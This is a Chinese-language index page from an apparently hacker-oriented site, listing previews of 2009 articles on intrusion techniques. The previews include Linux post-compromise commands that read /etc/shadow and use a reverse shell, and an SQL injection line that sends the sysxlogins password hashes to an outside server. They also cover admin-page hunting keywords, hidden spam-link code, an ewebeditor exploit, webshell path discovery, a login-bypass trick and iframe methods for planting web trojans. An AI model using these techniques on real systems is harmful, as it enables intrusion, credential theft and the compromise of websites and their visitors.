您的位置: 主页 > 安全攻防 > 黑客技术 >

  • linux入侵常用命令收集 日期:2009-12-02 13:25:23 点击:176 好评:1

    cat /etc/passwd 查看linux用户 cat /etc/shadow 查看用户密码需要root权限 cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息 ifconfig 查看本机ip信息 cat /etc/resolv.conf 查看DNS信息 bash -i 在反弹的shell中使用可以...

  • 安全网站的站点列表 日期:2009-11-29 14:43:49 点击:54 好评:2

    allhack.com 本网站提供了图书馆及下载专区。该图书馆为初学者提供了黑客知识和计算机技术基础知识。下载区包括了扫描工具,FLOOD工具,解密工具,拒绝服务攻击等。 alw.nih,gov 在安全目录下有大量的安全工具 anticode.com 入侵攻击,拒绝服务攻击,密钥记...

  • 汉化BT4的另一方法 日期:2009-11-28 10:17:56 点击:156 好评:1

    安装中文支持 apt-get install kde-i18n-zhcn 安装字体,这里我安装文泉驿字体 apt-get install xfonts-wqy dpkg-reconfigure locales 选择默认locale为中文的,如zh_CN.UTF-8 安装fcitx小企鹅输入法 apt-get install fcitx im-switch im-switch -s fcitx -z...

  • SQL旁注精华,珍藏版代码 日期:2009-11-28 10:16:28 点击:125 好评:1

    这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下: insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from databa...

  • 一批网站管理入口查询关键字 日期:2009-11-28 10:15:16 点击:92 好评:2

    公布一批网站管理入口查询关键字admin admin_index admin_admin index_admin admin/index admin/default admin/manage admin/login manage_index index_manage superadmin admin1 admin_login login_admin ad_login ad_manage count manager guanli denglu h...

  • 4种挂隐藏链接的代码 日期:2009-11-28 10:12:04 点击:152 好评:0

    4种挂隐藏链接的代码 如果您不晓得什么是隐藏链接,或者不晓得隐藏链接的作用, 那么您需要马上百度一下了.. 正文: DIV: div style=display:none; a href=http://www.skyweb.net.cn/ target=_blank淄博网站建设/a/div javascript: script language=javascript...

  • [php版]ewebeditor漏洞利用 日期:2009-11-28 10:09:41 点击:163 好评:0

    今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没 今天下了个3.8的,竟然找出一点令人兴奋的东西出来... php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道 利用方法:首先当然要找到登陆后台,默认是../eWeb...

  • Linux下快速定位web路徑方法 日期:2009-11-28 10:07:26 点击:54 好评:1

    在一個虛擬主機的服務器上,有NN多站,可能我們通過某種途徑搞到了一個webshell,可是找不到apache等web服務器的配置文件,找不到其他web的路徑,這個時候就郁悶了。假如服務器上有幾百個網站,文件夾的名稱都是隨機生成的,那就更郁悶了 不過不要氣餒,還是...

  • 新型万能登陆密码 日期:2009-11-22 10:30:02 点击:196 好评:0

    原创作者:oldjun 本 文章无技术含量,只是提供一个思路,思路来源于前不久暴出的那个ewebeditor2.16版本的上传漏洞。对于过滤了单引号或者做了post防注入的 站点,此方法也无能为力了;但对于很多对登陆端没做处理的网站,此方法值得一试,尤其是你已经知道...

  • 挂马的两个新方法 日期:2009-11-22 10:28:10 点击:85 好评:1

    这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。 一、利用htc文件来加载iframe。 百度百科里对...